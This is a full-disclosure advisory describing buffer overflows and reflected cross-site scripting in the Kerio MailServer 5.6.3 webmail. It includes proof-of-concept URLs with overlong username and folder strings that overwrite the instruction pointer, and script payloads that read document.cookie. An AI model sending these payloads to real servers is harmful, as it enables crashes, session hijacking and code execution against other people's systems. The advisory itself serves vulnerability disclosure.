Issue : Multiple buffer overflows and XSS in Kerio MailServer
Version affected 5.6.3 ( last in kerio website ) Vendor status : Vendor was notified Description : Kerio develop a mail server with support for Imap , Pop3, Smtp and SSL protocols . Besides , it includes a webmail . This webmail is vulnerable to basic cross site scriting attacks and buffer overflows that can lead to a session hijacking or executing code with system privileges . do_subscribe module A long user name causes a total stack corruption and an access violation . Three bytes of a thread instruction pointer EIP are overwriten with our user name supplied , thus making easy to execute code http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA add_acl module Due to insufficient saninization of variables passed to module that appear on the screen is possible to inject a script to be executed in the context of the webmail http://[server]/[EMAIL PROTECTED]/INBOX&add_name=<script>alert(document.cookie);</script> If we set as folder [EMAIL PROTECTED]/INBOX and click it the mail server will stop with an access violation . Besides , add_acl module is affected as well by the problem of long user names http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @localhost/INBOX&add_name=lucas The crash ocurrs in the same way , sign that is the same function what is causing the error . list module http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @localhost/INBOX The same buffer overflow . do_map module Due to insufficient saninization of variables passed to module that appear on the screen is possible to inject a script to be executed in the context of the webmail http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora Besides is vulnerable when using long user names http://[Server]/do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA For these buffer overflows to be exploitable you need an account in the webmail , but an intruder can build a link with code to execute and wait for the click of a user with an open session in Kerio mailserver . You can find a spanish version of this advisory at http://nautopia.org/vulnerabilidades/kerio_mailserver.htm -- Regards , David F. Madrid Madrid , Spain _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
